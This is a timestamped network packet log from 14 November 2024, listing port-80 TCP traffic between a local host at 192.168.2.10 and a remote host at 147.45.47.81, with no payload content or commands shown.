                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824099064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824116945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824125051 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824127913 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824139118 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824151993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824165106 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824172974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824184895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824188948 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824196100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824218988 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824224949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824237108 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824239016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824258089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824274063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824284077 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824286938 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824297905 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824309111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824318886 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824340105 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824342966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824363947 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824379921 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824431896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824441910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824453115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824484110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824489117 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824507952 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824522972 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824533939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824543953 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824553967 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824561119 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824583054 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824657917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824668884 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824678898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824696064 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824729919 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824769020 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824781895 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824805975 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824816942 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824817896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824830055 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824840069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824875116 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824898005 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824925900 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824944019 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824956894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824968100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824970007 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.824980021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825040102 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825041056 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825221062 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825252056 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825263023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825273991 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825287104 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825297117 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825301886 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825309038 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825319052 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825324059 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825330973 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825340986 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825341940 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825356960 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825397968 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825411081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825417995 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825422049 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825433016 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825467110 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825501919 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825526953 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825542927 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825558901 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825570107 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825579882 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825587034 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825591087 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825601101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825606108 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825627089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825633049 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825639963 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825649977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825659990 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825686932 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825793028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825805902 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825817108 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825830936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825841904 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825855017 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825865984 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825872898 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825876951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825887918 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825906038 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.825951099 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.826255083 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829071045 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829088926 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829101086 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829113007 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829123974 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829134941 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829145908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829166889 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829200029 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829200029 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.829200029 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.851533890 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.851547003 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.851558924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.851598024 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.882205009 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.882222891 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.882235050 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.882258892 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.882297039 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.884569883 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.884579897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.884591103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.884602070 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.884742975 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.884742975 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891128063 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891159058 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891170979 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891181946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891187906 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891195059 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891217947 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891309977 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891407013 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891511917 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891526937 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891537905 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.891632080 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894021034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894035101 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894046068 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894083977 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894089937 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894089937 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894095898 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894107103 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894143105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894160986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894196033 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894196033 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894285917 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894295931 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894310951 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894325018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894335032 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894344091 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894346952 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894351959 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894366026 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894392014 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894402027 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894411087 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894433022 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894433022 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894433022 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894710064 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894722939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894731998 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894768000 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894794941 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894805908 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894902945 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894912004 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894921064 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894932032 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894942045 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894951105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894953012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.894953012 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895031929 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895031929 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895035982 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895093918 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895104885 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895114899 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895132065 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895174026 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895207882 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895277023 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895286083 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895296097 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895361900 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895361900 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895370007 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895380974 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895390987 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895493984 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895535946 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895548105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895559072 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895579100 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895590067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895596981 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895596981 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895600080 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895697117 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895807981 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895859003 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895931959 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895941973 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895951986 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895962000 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895971060 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.895983934 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896034002 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896050930 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896050930 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896145105 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896156073 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896167040 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896177053 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896187067 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896209002 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896213055 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896229982 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896238089 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896248102 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896255970 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896275997 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896311998 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896397114 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896408081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896435976 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896445990 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896456003 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896466970 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896471024 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896471024 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896502018 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896665096 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.896753073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.924071074 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.924093008 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.924108982 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.924119949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.924128056 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.924129009 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.924139977 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.924165010 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.924202919 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.942923069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.942938089 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.942945957 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.942955017 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.942964077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.942972898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.942981958 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.942991018 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.942992926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943037987 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943383932 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943394899 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943403006 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943412066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943420887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943428993 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943430901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943439007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943459988 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943480968 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943648100 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943660021 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:19:58.943681955 CET8049958147.45.47.81192.168.2.10
